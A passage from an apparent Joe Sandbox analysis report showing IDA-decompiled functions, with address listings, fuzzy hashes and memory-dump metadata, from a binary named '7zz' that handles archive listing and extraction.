                                                                                                                                    • Instruction Fuzzy Hash: A3C19D70B00219AFDF24CFA6D980BEEBBB1BF48304F64442EE405A7341DB79A945CB58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042E01C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E0042E01C(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t192;
				intOrPtr* _t198;
				intOrPtr _t203;
				void* _t221;
				void* _t228;
				intOrPtr _t269;
				signed int _t273;
				intOrPtr* _t275;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t285;
				void* _t286;
				void* _t291;

				_t291 = __eflags;
				_t273 = __edx;
				L0046B890(0x4775cd, _t286);
				_t275 = __ecx;
				E00404AD0(_t286 - 0x5c, 8);
				 *((intOrPtr*)(_t286 - 0x5c)) = 0x47a688;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				E00404AD0(_t286 - 0xd8, 1);
				 *((intOrPtr*)(_t286 - 0xd8)) = 0x47ab08;
				E00404AD0(_t286 - 0xc4, 4);
				 *((intOrPtr*)(_t286 - 0xc4)) = 0x47ab80;
				 *(_t286 - 4) = 2;
				E00405B9F(_t286 - 0x30);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				E00404AD0(_t286 - 0x84, 4);
				 *((intOrPtr*)(_t286 - 0x84)) = 0x47ab80;
				E00404AD0(_t286 - 0x9c, 8);
				 *((intOrPtr*)(_t286 - 0x9c)) = 0x47a688;
				E00404AD0(_t286 - 0xb0, 1);
				 *((intOrPtr*)(_t286 - 0xb0)) = 0x47ab08;
				E00404AD0(_t286 - 0x70, 4);
				 *((intOrPtr*)(_t286 - 0x70)) = 0x47ab80;
				_t279 =  *((intOrPtr*)(_t286 + 0x10));
				 *(_t286 - 4) = 7;
				E0042DE7C(__ecx, __edx, 0, _t279, _t286 - 0x5c, _t286 - 0xd8, _t286 - 0xc4, _t286 - 0x30, _t286 - 0x84, _t286 - 0x9c, _t286 - 0xb0, _t286 - 0x70);
				 *(_t286 - 0x14) =  *(_t286 - 0x14) & 0x00000000;
				E00426448(_t286 - 0x164, _t291, 1);
				_t228 =  *_t279 +  *((intOrPtr*)(_t286 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t286 + 0xc) =  *(_t286 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t286 - 0x34)) =  *((intOrPtr*)(_t279 + 4));
				if( *((intOrPtr*)(_t286 - 0x28)) <= 0) {
					L17:
					 *(_t286 - 4) = 7;
					E00429925(_t286 - 0x164, _t303); // executed
					 *(_t286 - 4) = 6;
					E00408604(_t286 - 0x70);
					 *(_t286 - 4) = 5;
					E00408604(_t286 - 0xb0);
					 *(_t286 - 4) = 4;
					E00408604(_t286 - 0x9c);
					 *(_t286 - 4) = 3;
					E00408604(_t286 - 0x84);
					 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
					 *(_t286 - 4) = 0xc;
					_t281 = 0;
					L18:
					E0040862D();
					 *(_t286 - 4) = 2;
					E00408604(_t286 - 0x30);
					 *(_t286 - 4) = 1;
					E00408604(_t286 - 0xc4);
					 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
					E00408604(_t286 - 0xd8);
					 *(_t286 - 4) =  *(_t286 - 4) | 0xffffffff;
					E00408604(_t286 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t286 - 0xc));
					return _t281;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t286 - 0x40) =  *(_t286 - 0x40) & 0x00000000;
					 *(_t286 - 0x3c) =  *(_t286 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t286 - 0x24)) +  *(_t286 + 0xc) * 4));
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					_push(_t286 - 0x44);
					 *(_t286 - 4) = 9;
					L0042F129( *((intOrPtr*)(_t286 + 0x14)));
					 *(_t286 - 4) = 8;
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					E00407A18( *(_t286 - 0x3c));
					_t192 =  *((intOrPtr*)(_t286 + 0x14));
					_t284 =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x10) =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x1c) = E00429826( *((intOrPtr*)(_t286 + 0x10)));
					_t257 =  *(_t286 - 0x1c);
					if( *(_t286 - 0x1c) !=  *(_t286 - 0x1c) || 0 != _t273) {
						E0042D0F8(_t257);
					}
					E0040FA26(_t284,  *(_t286 - 0x1c));
					_push(0x14);
					_t198 = L004079F2();
					_t285 = 0;
					if(_t198 != 0) {
						 *((intOrPtr*)(_t198 + 4)) = 0;
						 *_t198 = 0x47b3d0;
						_t285 = _t198;
					}
					_t296 = _t285;
					 *((intOrPtr*)(_t286 - 0x88)) = _t285;
					if(_t285 != 0) {
						 *((intOrPtr*)( *_t285 + 4))(_t285);
					}
					_t273 =  *(_t286 - 0x14);
					 *((intOrPtr*)(_t285 + 8)) =  *((intOrPtr*)( *(_t286 - 0x10) + 8));
					 *((intOrPtr*)(_t285 + 0x10)) = 0;
					 *(_t285 + 0xc) =  *(_t286 - 0x1c);
					 *(_t286 - 4) = 0xa;
					_t203 = E004264F7(_t286 - 0x164, _t296,  *_t275, _t228,  *((intOrPtr*)(_t286 - 0x34)),  *(_t286 - 0x50) + _t273 * 8,  *((intOrPtr*)(_t286 + 0x10)), _t285, 0,  *((intOrPtr*)(_t286 + 0x18)),  *((intOrPtr*)(_t286 + 0x1c)), 0, 1); // executed
					 *((intOrPtr*)(_t286 - 0x48)) = _t203;
					if(_t203 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t286 + 0x10)) + 0x54)) != 0) {
						_t273 =  *(_t286 - 0x1c);
						_t221 = L0046B1C0( *((intOrPtr*)( *(_t286 - 0x10) + 8)), _t273);
						_t272 =  *((intOrPtr*)(_t286 + 0x10));
						if(_t221 !=  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x50))) {
							E0042D0F8(_t272);
						}
					}
					 *(_t286 - 0x10) =  *(_t286 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t286 - 4) = 8;
						if(_t285 != 0) {
							 *((intOrPtr*)( *_t285 + 8))(_t285);
						}
						 *(_t286 + 0xc) =  *(_t286 + 0xc) + 1;
						_t303 =  *(_t286 + 0xc) -  *((intOrPtr*)(_t286 - 0x28));
						if( *(_t286 + 0xc) <  *((intOrPtr*)(_t286 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t273 =  *(_t286 - 0x50);
							 *(_t286 - 0x14) =  *(_t286 - 0x14) + 1;
							_t269 =  *((intOrPtr*)(( *(_t286 - 0x14) << 3) + _t273));
							_t228 = _t228 + _t269;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t275 + 0x48)) =  *((intOrPtr*)(_t275 + 0x48)) + _t269;
							asm("adc [edi+0x4c], eax");
							 *(_t286 - 0x10) =  *(_t286 - 0x10) + 1;
						} while ( *(_t286 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t285;
				 *(_t286 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t285 + 8))(_t285);
				}
				 *(_t286 - 4) = 7;
				E00429925(_t286 - 0x164, __eflags);
				 *(_t286 - 4) = 6;
				E00408604(_t286 - 0x70);
				 *(_t286 - 4) = 5;
				E00408604(_t286 - 0xb0);
				 *(_t286 - 4) = 4;
				E00408604(_t286 - 0x9c);
				 *(_t286 - 4) = 3;
				E00408604(_t286 - 0x84);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				_t281 =  *((intOrPtr*)(_t286 - 0x48));
				 *(_t286 - 4) = 0xb;
				goto L18;
			}
















                                                                                                                                    0x0042e01c
                                                                                                                                    0x0042e01c
                                                                                                                                    0x0042e021
                                                                                                                                    0x0042e02f
                                                                                                                                    0x0042e036
                                                                                                                                    0x0042e03b
                                                                                                                                    0x0042e042
                                                                                                                                    0x0042e04e
                                                                                                                                    0x0042e058
                                                                                                                                    0x0042e066
                                                                                                                                    0x0042e070
                                                                                                                                    0x0042e079
                                                                                                                                    0x0042e07d
                                                                                                                                    0x0042e082
                                                                                                                                    0x0042e091
                                                                                                                                    0x0042e096
                                                                                                                                    0x0042e0a4
                                                                                                                                    0x0042e0a9
                                                                                                                                    0x0042e0bb
                                                                                                                                    0x0042e0c0
                                                                                                                                    0x0042e0cb
                                                                                                                                    0x0042e0d0
                                                                                                                                    0x0042e0d6
                                                                                                                                    0x0042e10a
                                                                                                                                    0x0042e10e
                                                                                                                                    0x0042e113
                                                                                                                                    0x0042e11f
                                                                                                                                    0x0042e129
                                                                                                                                    0x0042e12c
                                                                                                                                    0x0042e12f
                                                                                                                                    0x0042e137
                                                                                                                                    0x0042e13a
                                                                                                                                    0x0042e2a3
                                                                                                                                    0x0042e2a9
                                                                                                                                    0x0042e2ad
                                                                                                                                    0x0042e2b5
                                                                                                                                    0x0042e2b9
                                                                                                                                    0x0042e2c4
                                                                                                                                    0x0042e2c8
                                                                                                                                    0x0042e2d3
                                                                                                                                    0x0042e2d7
                                                                                                                                    0x0042e2e2
                                                                                                                                    0x0042e2e6
                                                                                                                                    0x0042e2eb
                                                                                                                                    0x0042e2f2
                                                                                                                                    0x0042e2f6
                                                                                                                                    0x0042e2f8
                                                                                                                                    0x0042e2fb
                                                                                                                                    0x0042e303
                                                                                                                                    0x0042e307
                                                                                                                                    0x0042e312
                                                                                                                                    0x0042e316
                                                                                                                                    0x0042e31b
                                                                                                                                    0x0042e325
                                                                                                                                    0x0042e32a
                                                                                                                                    0x0042e331
                                                                                                                                    0x0042e33e
                                                                                                                                    0x0042e346
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042e140
                                                                                                                                    0x0042e140
                                                                                                                                    0x0042e146
                                                                                                                                    0x0042e14a
                                                                                                                                    0x0042e156
                                                                                                                                    0x0042e159
                                                                                                                                    0x0042e162
                                                                                                                                    0x0042e163
                                                                                                                                    0x0042e167
                                                                                                                                    0x0042e16f
                                                                                                                                    0x0042e173
                                                                                                                                    0x0042e176
                                                                                                                                    0x0042e17b
                                                                                                                                    0x0042e185
                                                                                                                                    0x0042e18c
                                                                                                                                    0x0042e194
                                                                                                                                    0x0042e199
                                                                                                                                    0x0042e19e
                                                                                                                                    0x0042e1a4
                                                                                                                                    0x0042e1a4
                                                                                                                                    0x0042e1ae
                                                                                                                                    0x0042e1b3
                                                                                                                                    0x0042e1b5
                                                                                                                                    0x0042e1ba
                                                                                                                                    0x0042e1bf
                                                                                                                                    0x0042e1c1
                                                                                                                                    0x0042e1c4
                                                                                                                                    0x0042e1ca
                                                                                                                                    0x0042e1ca
                                                                                                                                    0x0042e1cc
                                                                                                                                    0x0042e1ce
                                                                                                                                    0x0042e1d4
                                                                                                                                    0x0042e1d9
                                                                                                                                    0x0042e1d9
                                                                                                                                    0x0042e1ea
                                                                                                                                    0x0042e1ed
                                                                                                                                    0x0042e1f6
                                                                                                                                    0x0042e1f9
                                                                                                                                    0x0042e209
                                                                                                                                    0x0042e219
                                                                                                                                    0x0042e220
                                                                                                                                    0x0042e223
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042e230
                                                                                                                                    0x0042e235
                                                                                                                                    0x0042e23b
                                                                                                                                    0x0042e240
                                                                                                                                    0x0042e246
                                                                                                                                    0x0042e248
                                                                                                                                    0x0042e248
                                                                                                                                    0x0042e246
                                                                                                                                    0x0042e250
                                                                                                                                    0x0042e258
                                                                                                                                    0x0042e286
                                                                                                                                    0x0042e288
                                                                                                                                    0x0042e28c
                                                                                                                                    0x0042e291
                                                                                                                                    0x0042e291
                                                                                                                                    0x0042e294
                                                                                                                                    0x0042e29a
                                                                                                                                    0x0042e29d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042e25a
                                                                                                                                    0x0042e25a
                                                                                                                                    0x0042e25d
                                                                                                                                    0x0042e263
                                                                                                                                    0x0042e266
                                                                                                                                    0x0042e26d
                                                                                                                                    0x0042e26f
                                                                                                                                    0x0042e272
                                                                                                                                    0x0042e275
                                                                                                                                    0x0042e278
                                                                                                                                    0x0042e281
                                                                                                                                    0x00000000
                                                                                                                                    0x0042e25a
                                                                                                                                    0x0042e258
                                                                                                                                    0x0042e349
                                                                                                                                    0x0042e34b
                                                                                                                                    0x0042e34f
                                                                                                                                    0x0042e354
                                                                                                                                    0x0042e354
                                                                                                                                    0x0042e35d
                                                                                                                                    0x0042e361
                                                                                                                                    0x0042e369
                                                                                                                                    0x0042e36d
                                                                                                                                    0x0042e378
                                                                                                                                    0x0042e37c
                                                                                                                                    0x0042e387
                                                                                                                                    0x0042e38b
                                                                                                                                    0x0042e396
                                                                                                                                    0x0042e39a
                                                                                                                                    0x0042e39f
                                                                                                                                    0x0042e3a6
                                                                                                                                    0x0042e3a9
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042E021
                                                                                                                                      • Part of subcall function 0042F129: __EH_prolog.LIBCMT ref: 0042F12E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: c[@
                                                                                                                                    • API String ID: 3519838083-2588109156
                                                                                                                                    • Opcode ID: 408ce7bc345c32c028819c738f8a7d9a17f4eb386957e27dfbb5ebcfe7936c0f
                                                                                                                                    • Instruction ID: 13632c0e7c80ea0d0342c65c90266a16cd9ecf8cb86b77326c192e1623b2d142
                                                                                                                                    • Opcode Fuzzy Hash: 408ce7bc345c32c028819c738f8a7d9a17f4eb386957e27dfbb5ebcfe7936c0f
                                                                                                                                    • Instruction Fuzzy Hash: 05C14A70D00268DFDB14DF95D945BEEB7B4BF14308F14809EE909A7291CB786A48CFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041003E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E0041003E(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* _t125;
				intOrPtr* _t128;
				void* _t142;
				signed int _t168;
				intOrPtr* _t175;
				intOrPtr _t176;
				signed int _t208;
				void* _t209;
				signed int _t212;
				void* _t218;

				L0046B890(E00474107, _t218);
				 *((intOrPtr*)(_t218 - 0x24)) = __edx;
				E00405B9F(_t218 - 0x38);
				 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
				_t168 = 0;
				 *(_t218 - 4) = 0;
				L14();
				 *(_t218 - 4) = 1;
				E00405B9F(_t218 - 0x20);
				 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
				 *(_t218 - 4) = 2;
				E00404AD0(_t218 - 0x74, 4);
				 *((intOrPtr*)(_t218 - 0x74)) = 0x47a9ac;
				_push(_t218 - 0x74);
				_push(_t218 - 0x20);
				_push(0);
				_t175 = __ecx;
				 *(_t218 - 4) = 3;
				_t125 = E00415349(__ecx, _t218 - 0xc4); // executed
				if(_t125 != 0 ||  *(_t218 - 0x18) > 0) {
					 *(_t218 + 8) = "cannot find archive";
					L0046B8F4(_t218 + 8, 0x47cf70);
					_push(0x47a420);
					_t128 = _t175;
					__eflags = 0;
					_t176 = 4;
					 *((intOrPtr*)(_t128 + 4)) = 0;
					 *((intOrPtr*)(_t128 + 8)) = 0;
					 *((intOrPtr*)(_t128 + 0xc)) = 0;
					 *((intOrPtr*)(_t128 + 0x10)) = _t176;
					 *_t128 = 0x47a420;
					 *((intOrPtr*)(_t128 + 0x18)) = 0;
					 *((intOrPtr*)(_t128 + 0x1c)) = 0;
					 *((intOrPtr*)(_t128 + 0x20)) = 0;
					 *((intOrPtr*)(_t128 + 0x24)) = _t176;
					 *((intOrPtr*)(_t128 + 0x14)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x2c)) = 0;
					 *((intOrPtr*)(_t128 + 0x30)) = 0;
					 *((intOrPtr*)(_t128 + 0x34)) = 0;
					 *((intOrPtr*)(_t128 + 0x38)) = _t176;
					 *((intOrPtr*)(_t128 + 0x28)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x40)) = 0;
					 *((intOrPtr*)(_t128 + 0x44)) = 0;
					 *((intOrPtr*)(_t128 + 0x48)) = 0;
					 *((intOrPtr*)(_t128 + 0x4c)) = _t176;
					 *((intOrPtr*)(_t128 + 0x3c)) = 0x47aa4c;
					return _t128;
				} else {
					 *(_t218 - 4) = 2;
					E00408604(_t218 - 0x74);
					 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
					 *(_t218 - 4) = 4;
					E0040862D();
					 *(_t218 - 4) = 1;
					E00408604(_t218 - 0x20);
					_t208 = 0;
					if( *((intOrPtr*)(_t218 - 0x80)) > 0) {
						do {
							if(( *( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x7c)) + _t208 * 4)) + 0x2c) >> 0x00000004 & 0x00000001) == 0) {
								_push(E0041528B(_t218 - 0xc4, _t218 - 0x18, _t208));
								 *(_t218 - 4) = 5;
								E00406796(_t218 - 0x38);
								 *(_t218 - 4) = 1;
								E00407A18( *(_t218 - 0x18));
							}
							_t208 = _t208 + 1;
							_t228 = _t208 -  *((intOrPtr*)(_t218 - 0x80));
						} while (_t208 <  *((intOrPtr*)(_t218 - 0x80)));
					}
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E004102DF(_t218 - 0xc4, _t228);
					if( *((intOrPtr*)(_t218 - 0x30)) == _t168) {
						 *(_t218 + 8) = "there is no such archive";
						L0046B8F4(_t218 + 8, 0x47cf70);
					}
					E00405B9F(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					_t209 = 0;
					 *(_t218 - 4) = 6;
					if( *((intOrPtr*)(_t218 - 0x30)) > _t168) {
						do {
							 *(_t218 - 0x18) = _t168;
							 *(_t218 - 0x14) = _t168;
							 *(_t218 - 0x10) = _t168;
							E00401E9A(_t218 - 0x18, 3);
							 *(_t218 - 4) = 7;
							E0040A5AF();
							_push(_t218 - 0x18);
							E00406796(_t218 - 0x60);
							 *(_t218 - 4) = 6;
							E00407A18( *(_t218 - 0x18));
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t218 - 0x30)));
					}
					E00404AD0(_t218 - 0x4c, 4);
					 *((intOrPtr*)(_t218 - 0x4c)) = 0x47a668;
					 *(_t218 - 4) = 8;
					E004195A6(_t218 - 0x60, _t218 - 0x4c);
					E0040867E( *((intOrPtr*)(_t218 - 0x24)),  *((intOrPtr*)(_t218 - 0x44)));
					E0040867E( *(_t218 + 8),  *((intOrPtr*)(_t218 - 0x44)));
					if( *((intOrPtr*)(_t218 - 0x44)) > _t168) {
						do {
							_t212 =  *( *((intOrPtr*)(_t218 - 0x40)) + _t168 * 4) << 2;
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x2c)))));
							E00406796( *((intOrPtr*)(_t218 - 0x24)));
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x54)))));
							E00406796( *(_t218 + 8));
							_t168 = _t168 + 1;
						} while (_t168 <  *((intOrPtr*)(_t218 - 0x44)));
					}
					 *(_t218 - 4) = 6;
					E00408604(_t218 - 0x4c);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					 *(_t218 - 4) = 9;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E00408604(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
					 *(_t218 - 4) = 0xa;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
					_t142 = E00408604(_t218 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
					return _t142;
				}
			}













                                                                                                                                    0x00410043
                                                                                                                                    0x00410053
                                                                                                                                    0x00410059
                                                                                                                                    0x00410063
                                                                                                                                    0x00410066
                                                                                                                                    0x0041006e
                                                                                                                                    0x00410071
                                                                                                                                    0x00410079
                                                                                                                                    0x0041007d
                                                                                                                                    0x00410082
                                                                                                                                    0x0041008a
                                                                                                                                    0x0041008e
                                                                                                                                    0x00410093
                                                                                                                                    0x004100a3
                                                                                                                                    0x004100a7
                                                                                                                                    0x004100a8
                                                                                                                                    0x004100a9
                                                                                                                                    0x004100ab
                                                                                                                                    0x004100af
                                                                                                                                    0x004100b6
                                                                                                                                    0x00410281
                                                                                                                                    0x00410288
                                                                                                                                    0x0041028d
                                                                                                                                    0x0041028e
                                                                                                                                    0x00410292
                                                                                                                                    0x00410294
                                                                                                                                    0x0041029a
                                                                                                                                    0x0041029d
                                                                                                                                    0x004102a0
                                                                                                                                    0x004102a3
                                                                                                                                    0x004102a6
                                                                                                                                    0x004102ac
                                                                                                                                    0x004102af
                                                                                                                                    0x004102b2
                                                                                                                                    0x004102b5
                                                                                                                                    0x004102b8
                                                                                                                                    0x004102bb
                                                                                                                                    0x004102be
                                                                                                                                    0x004102c1
                                                                                                                                    0x004102c4
                                                                                                                                    0x004102c7
                                                                                                                                    0x004102ca
                                                                                                                                    0x004102cd
                                                                                                                                    0x004102d0
                                                                                                                                    0x004102d3
                                                                                                                                    0x004102d6
                                                                                                                                    0x004102de
                                                                                                                                    0x004100c5
                                                                                                                                    0x004100c8
                                                                                                                                    0x004100cc
                                                                                                                                    0x004100d1
                                                                                                                                    0x004100d7
                                                                                                                                    0x004100db
                                                                                                                                    0x004100e3
                                                                                                                                    0x004100e7
                                                                                                                                    0x004100ec
                                                                                                                                    0x004100f1
                                                                                                                                    0x004100f3
                                                                                                                                    0x00410101
                                                                                                                                    0x00410113
                                                                                                                                    0x00410117
                                                                                                                                    0x0041011b
                                                                                                                                    0x00410120
                                                                                                                                    0x00410127
                                                                                                                                    0x0041012c
                                                                                                                                    0x0041012d
                                                                                                                                    0x0041012e
                                                                                                                                    0x0041012e
                                                                                                                                    0x004100f3
                                                                                                                                    0x00410133
                                                                                                                                    0x0041013d
                                                                                                                                    0x00410145
                                                                                                                                    0x00410150
                                                                                                                                    0x00410157
                                                                                                                                    0x00410157
                                                                                                                                    0x0041015f
                                                                                                                                    0x00410164
                                                                                                                                    0x00410167
                                                                                                                                    0x0041016c
                                                                                                                                    0x00410170
                                                                                                                                    0x00410172
                                                                                                                                    0x00410177
                                                                                                                                    0x0041017a
                                                                                                                                    0x0041017d
                                                                                                                                    0x00410180
                                                                                                                                    0x0041018b
                                                                                                                                    0x00410196
                                                                                                                                    0x004101a1
                                                                                                                                    0x004101a2
                                                                                                                                    0x004101a7
                                                                                                                                    0x004101ae
                                                                                                                                    0x004101b3
                                                                                                                                    0x004101b5
                                                                                                                                    0x00410172
                                                                                                                                    0x004101bf
                                                                                                                                    0x004101c4
                                                                                                                                    0x004101d1
                                                                                                                                    0x004101d5
                                                                                                                                    0x004101e0
                                                                                                                                    0x004101eb
                                                                                                                                    0x004101f3
                                                                                                                                    0x004101f5
                                                                                                                                    0x00410203
                                                                                                                                    0x00410206
                                                                                                                                    0x00410209
                                                                                                                                    0x00410214
                                                                                                                                    0x00410217
                                                                                                                                    0x0041021c
                                                                                                                                    0x0041021d
                                                                                                                                    0x004101f5
                                                                                                                                    0x00410225
                                                                                                                                    0x00410229
                                                                                                                                    0x0041022e
                                                                                                                                    0x00410234
                                                                                                                                    0x00410238
                                                                                                                                    0x0041023d
                                                                                                                                    0x00410244
                                                                                                                                    0x00410249
                                                                                                                                    0x0041024f
                                                                                                                                    0x00410256
                                                                                                                                    0x0041025b
                                                                                                                                    0x00410262
                                                                                                                                    0x0041026d
                                                                                                                                    0x00410275
                                                                                                                                    0x00410275

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00410043
                                                                                                                                      • Part of subcall function 00415349: __EH_prolog.LIBCMT ref: 0041534E
                                                                                                                                      • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3519838083-2780377667
                                                                                                                                    • Opcode ID: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                                                                                    • Instruction ID: a6bdb68d8052a433f7f109985f49a34908dcb5d84b45f2bdbde216e6b6000813
                                                                                                                                    • Opcode Fuzzy Hash: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                                                                                    • Instruction Fuzzy Hash: AD914EB0C00258DFCB14EF9AC985ADDBBB5BF54308F1181AEE109B7292DB785A44CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C83C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                    			E0040C83C(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				intOrPtr _t42;
				intOrPtr* _t45;
				signed int _t50;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;

				L0046B890(0x473e52, _t60);
				_push(__ecx);
				_push(__ecx);
				_t26 =  *0x490be0; // 0x12
				 *((intOrPtr*)(_t60 - 0x14)) = __edx;
				_t50 = 0;
				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
				if(_t26 <= 0) {
					L17:
					if( *((intOrPtr*)(_t60 + 0x18)) != 0) {
						_t53 =  *((intOrPtr*)(_t60 - 0x10));
						if( *( *((intOrPtr*)(_t60 - 0x10))) != 0) {
							_push(0x78);
							_t42 = L004079F2();
							 *((intOrPtr*)(_t60 + 0x14)) = _t42;
							 *(_t60 - 4) = 0;
							if(_t42 == 0) {
								_t58 = 0;
							} else {
								_t31 = E0040D550(_t42); // executed
								_t58 = _t31;
							}
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							E0040C9B4( *((intOrPtr*)(_t60 - 0x14)), _t58);
							_t22 = _t58 + 0x74; // 0x74
							E0040C9B4(_t22,  *_t53);
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
					return 0;
				} else {
					_t45 = 0x490ae0;
					do {
						_t59 =  *_t45;
